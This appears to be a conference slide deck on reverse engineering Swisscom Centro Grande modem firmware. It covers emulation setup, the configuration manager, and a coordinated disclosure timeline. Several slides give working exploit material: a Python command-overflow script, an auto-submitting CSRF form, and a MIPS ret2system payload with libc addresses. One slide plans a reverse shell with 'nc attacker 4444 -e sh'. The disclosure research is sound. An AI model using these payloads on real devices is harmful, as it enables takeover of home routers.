The document discusses reverse engineering the firmware of Swisscom's Centro Grande modems. It identifies several vulnerabilities found, including a command overflow issue that allows complete control of the device by exceeding the input buffer, and multiple buffer overflow issues that can be exploited to execute code remotely by crafting specially formatted XML files. Details are provided on the exploitation techniques and timeline of coordination with Swisscom to address the vulnerabilities.

1. Reverse engineering Swisscom’sReverse engineering Swisscom’s
Centro Grande modemsCentro Grande modems
Alain Mowat & Thomas ImbertAlain Mowat & Thomas Imbert

2. 2whoami
› Alain Mowat (@plopz0r)
› Head of Audit division at SCRT
› Pentest
› Code review
› Trainings
› Mostly a Web App guy
› Member of 0daysober CTF team
› Watch other people exploiting cool vulns

3. 3Background
› Why look into the Swisscom modems?
› Why this talk?
› I don’t actually own a Swisscom modem
› Made it a bit harder to study...

4. 4Attack Surface
› ADB# show netstat
tcp 0 0 192.168.1.1:50602 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:9034 0.0.0.0:* LISTEN
tcp 11 0 192.168.1.1:8080 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN
tcp 0 0 192.168.1.1:22 0.0.0.0:* LISTEN
tcp 0 0 192.168.1.1:23 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:7547 0.0.0.0:* LISTEN
udp 0 0 0.0.0.0:9090 0.0.0.0:*
udp 0 0 127.0.0.1:15000 0.0.0.0:*
udp 0 0 0.0.0.0:53 0.0.0.0:*
udp 0 0 0.0.0.0:323 0.0.0.0:*
udp 0 0 0.0.0.0:67 0.0.0.0:*
udp 0 0 0.0.0.0:68 0.0.0.0:*
udp 0 0 178.199.180.148:5060 0.0.0.0:*
udp 0 0 192.168.1.1:5351 0.0.0.0:*
udp 0 0 0.0.0.0:1900 0.0.0.0:*
udp 0 0 192.168.1.1:47863 0.0.0.0:*
udp 0 0 0.0.0.0:123 0.0.0.0:*
udp 0 0 ff02::1:2:547 :::*
udp 0 0 :::53 :::*
udp 0 0 :::323 :::*
udp 0 0 :::123 :::*
raw 0 0 0.0.0.0:2 0.0.0.0:* 2
raw 0 0 0.0.0.0:6 0.0.0.0:* 6
raw 0 0 :::58 :::*

5. 5Attack Surface
› ADB# show processes
256 0 2040 S logd
259 0 1308 S klogd -c3
271 0 832 S ec
343 0 3236 S cm
350 0 0 SW [dsl0]
363 0 0 SW [bcmsw]
364 0 0 SW [bcmsw_timer]
365 0 0 SW< [linkwatch]
5889 0 1132 S dropbear -P /tmp/dropbear-local.pid -l 20 -p 192.168
6227 0 1312 S telnetd Local -u 20 -b 192.168.1.1:23 -I 300
6898 65534 2292 S nhttpd -c /tmp/nhttpd.conf
7362 0 1000 S dhcps /tmp/dhcps.conf
7910 0 764 S dns
8014 0 1088 S miniupnpd -i ptm0 -a 192.168.1.1 -N -I 4
8026 0 736 S /bin/wpspbc
8223 0 2676 S /usr/sbin/hostapd -B /tmp/wlan/config/hostapd.conf
9164 0 1664 S /bin/sh /etc/rc.common /etc/rc.d/S11services.sh boot
9177 0 2940 S cwmp
9204 0 1316 S /bin/sh /etc/ah/printk_dump.sh
9353 0 884 S ec
9553 0 1312 S /bin/sh /etc/ah/procSentinel.sh cm 300
11846 0 1332 S /bin/sh DHCPv4Client.sh
11848 0 1320 S udhcpc -S -R -f -W rgH7sqo?h@5Y -t 500000 -T 4 -o -C
14753 0 792 S igmpproxy -c /tmp/igmpproxy.conf -p /tmp/igmpproxy.p
15287 0 3576 S voip
15688 0 740 S tproxyd 80 8080 1 192.168.1.1 /ui/swc/parentalcontro
15923 0 1056 S N chronyd -f /tmp/chrony.conf
16770 0 820 S radvd
16812 0 2036 S dibbler-server start

6. 6Finding the firmware
› Locate the firmware
› https://www.swisscom.ch/en/residential/help/device/internet-router/centro-
grande.html
› Vx226x1_61400.sig
› Version at the time
› 6.14.00

7. 7Extracting the firmware
› Binwalk (https://github.com/devttys0/binwalk)
› Firmware modification kit
› ./extract-firmware.sh

8. 8CPE WAN Management Protocol
› Also known as TR-069
› Protocol that defines how to manage « Customer-premises Equipment »
› cwmp binary
› Listens to 0.0.0.0:7547
› iptables rule allows access only from certain Swisscom subnets

9. 9Web interface
› Web server is nhttpd (http://www.nazgul.ch/dev_nostromo.html)
› If a binary file is accessed through the web interface, it executes it
› Directory traversal → Code Exec in version 1.9.3

10. 10Web interface
› Mostly managed by a CGI called ui

11. 11Emulating the device
› OpenWRT (https://openwrt.org/)
› Linux distribution for embedded devices
› Qemu (http://wiki.qemu.org/Main_Page)
› Machine emulator and virtualizer

12. 12Configuring OpenWRT
› make menuconfig
› MIPS target
› Add all debugging and networking tools
› Cross-compile nhttpd
› Generate ramdisk
› Copy Swisscom firmware files to the image
› Run image with qemu
› qemu-system-mips -kernel openwrt-malta-be-vmlinux-ini-
tramfs.elf -net tap -net nic -nographic -m 2048

13. 13Setting up the image
› nhttpd server
serverroot /www
serveradmin webmaster@adbglobal.com
servermimes conf/mimes
docroot /www/htdocs
docindex lanhosts
logpid /tmp/logs
user nobody
disablehttp 0
notfound 501
sslport 443
sslcert /etc/certs/server.crt
sslcertkey /etc/certs/server.key
sslcertca /etc/certs/ca.pem
sslcertreq *
serverlisten 0.0.0.0
servername localhost

14. 14Web interface

15. 15YAPL ?

16. 16Web request overview
nhttpd
swc_login.yapl
swc_common.yapl
swc_firewall.yapl
...
ui
cm
POST /ui/swc/login Environment
setup
Configuration command
Get corresponding YAPL « script »

17. 17Configuration manager
› Used to view and modify the device’s configuration
› Bound to localhost:9034
› Also /tmp/cmctl socket
› Several possible commands
› GETO, GETV, …
› SET, SETM, …
› RESET, REBOOT, ...
› DUMP, EXPORT, ...

18. 18Mandatory IDA graph

19. 19Configuration manager
› Main loop
listen on localhost port 9034
socket = accept
while 1:
input = socket.recv(16384)
handleRequest(input)
def handleRequest(input):
type = validateRequestType(input)
params = validateRequestParams(input)
callTypeHandler(params)

20. 20Configuration Manager

21. 21Finalizing the image setup
udhcpc -i br-lan
cm
touch /tmp/cmctl
chmod 777 /tmp/cmctl
nhttpd -c /www/nhttpd.cfg
nc localhost 9034
DOM Device /etc/cm/tr181/dom/
DOM InternetGatewayDevice /etc/cm/tr098/dom/
CONF /etc/cm/conf/
ADD InternetGatewayDevice.WANDevice
ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice
ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection
SET Device.IP.Interface.1.IPv4Address.1.X_ADB_TR098Reference
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1
SET Device.ManagementServer.X_ADB_ConnectionRequestInterface Device.IP.Interface.1
SET Device.IP.Interface.1.Status Up
SET Device.Ethernet.Link.1.Name br-lan
SET Device.DeviceInfo.SerialNumber 123456
SET Device.IP.Interface.1.X_ADB_Upstream true
SET Device.IP.Interface.1.X_ADB_TR098Reference
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1

22. 22Running image

23. 23Configuration manager
› Special syntax
› Similar to SQL in certain ways
› SELECT =~ GETV
› UPDATE =~ SET
› Conditions
› GETO A.B.C.[Test=1]
› GETO A.B.C.[Test~1]
› GETO A.B.C.[Test!1]

24. 24Vulnerability #1 : Command overflow
› Each call to recv is treated as a new command
› By sending more than 16384 characters, we can craft a new configuration
command
› Logging in to the web interface generates a call to the configuration
manager that looks like this
› GETO Users.User.[Username=ATTACKER_CONTROLLED]
› By providing a long username, we can exceed the 16348 limit and gene-
rate a new request within the configuration manager
› Allows complete control over the device
› Change passwords
› Allow remote access
› ...

25. 25Vulnerability #1 : Command overflow
ui cm
GETO Users.User.[Username=A
AAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAA
[…]
AAAAAAAAAAAAAAAAAAAAAAAAAAA
REBOOTn
recv(16384)
recv(16384)
send
process(‘GETO Users……’)
process(‘REBOOT’)

26. 26Exploit #1 : Command overflow
from requests import post
payload = dict()
payload['userName'] = ( 16358 ) * 'a' + 'REBOOT' + 'n'
payload['userPwd'] = 'a'
payload['login'] = 'Login'
payload['language'] = ''
while 1:
r = post('http://192.168.1.1/ui/swc/login/index', data=payload)
D
EM
O

27. 27Vulnerability #2 : Login CSRF
› Use CSRF to exploit someone else’s device
<html>
<body>
<form method="POST" action="http://192.168.1.1/ui/swc/login/index">
<input type="hidden" name="userName" value="aaaaaaaaaa[...]aaaREBOOT%0a"/>
<input type="hidden" name="userPwd" value="a"/>
<input type="hidden" name="login" value="login"/>
<input type="hidden" name="language" value=""/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

28. 28Exposed web interfaces – Centro Business

29. 29Vulnerability #3 : Buffer overflow(s)
› Buffer overflow when parsing the name of XML files when performing
certain commands (CONF, DOM, …)
› Requirements
› Arbitrarily-named XML file on the device
› file and folder are both limited to 4096 in size
parseFilesinFolder(folder):
char path[4096];
files = scandir(folder)
for file in files:
if file ends with ".xml":
strncat(path,folder,4096)
strncat(path,file,4096)
parseFile(filename)

30. 30Exploit #3 : Creating the XML file
› The PATHSAVE command takes 2 arguments
› An XML filename
› Property that needs to be saved
› PATHSAVE /tmp/test.xml Users.User.1.Password
› Can use this to write an arbitrarily-named file on the device
› Exploit can then be triggered by prepending folder with lots of /
› CONF /////////////////////////////////////[…]/tmp/exploit.xml

31. 31Exploit #3 : Exploiting a MIPS binary
Prologue
Epilogue

32. 32Exploit #3 : Exploiting a MIPS binary
› No ASLR on the device
› No NX
› No canaries
› A version of nc with the -e switch is present on the device
› Try to call system(‘nc attacker 4444 -e sh’)
› Arguments are not passed on the stack though, but in registers
› $a0
› $a1
› …

33. 33Exploit #3 : ret2system
› Quick analysis gives address of system in libUclibc (Centro business) :
› Libuclibc base : 0x2aaf8000
› System is at offset : 0x54610
› Real address : 0x2ab4c610
› Need a gadget in order to get our argument to system in $a0
› Make $a0 point to address in the stack
› $s0 is also under our control

34. 34Exploit #3 : ret2system
/tmp/aaaaaaaaaaaaaaaax2axb4xc6x10bbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbx2axb1xcaxacaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaareboot;
#bbbb.xml
$ra → gadget
$s0 → system
command
64 * ‘a’ (addiu $a0,$sp,64)

35. 35Exploit #3 : Full exploit D
EM
O

36. 36Disclosure timeline
› 9 September 2015 : Initial disclosure to Swisscom
› 10 September 2015 : Vulnerabilities acknowledged by Swisscom
› 11 September 2015 : Vendor notified (ADB)
› 18 September 2015 : Confirmation of vulns & quick fix available
› 24 September 2015 : Test of quick fix
› 29 September 2015 : Contact with ADB
› October 2015 : Rollout of quick fix to all devices
› January 2016 : Status full fix :
› Centro grande : 100 %
› Centro Business 1.0 : 50 %
› Centro Business 2.0 : 100 %
› 13 June 2016 : Disclure

37. 37Swisscom bounty
› Combination of flaws rewarded with 3’000 CHF
› Donated to the Ligue Vaudoise contre le Cancer
› Swisscom Bug Bounty program is up & running
› Talk is tomorrow afternoon :)

38. 38Conclusions
› Attackers
› Look into other processes on the modem
› miniupnp
› voip
› Embedded devices are found everywhere nowadays
› Huge attack surface
› Less people reversing firmwares than searching for XSS
› Defenders
› Consider 0days in your penetration tests
› Test your defense in depth
› Test your ability to detect breaches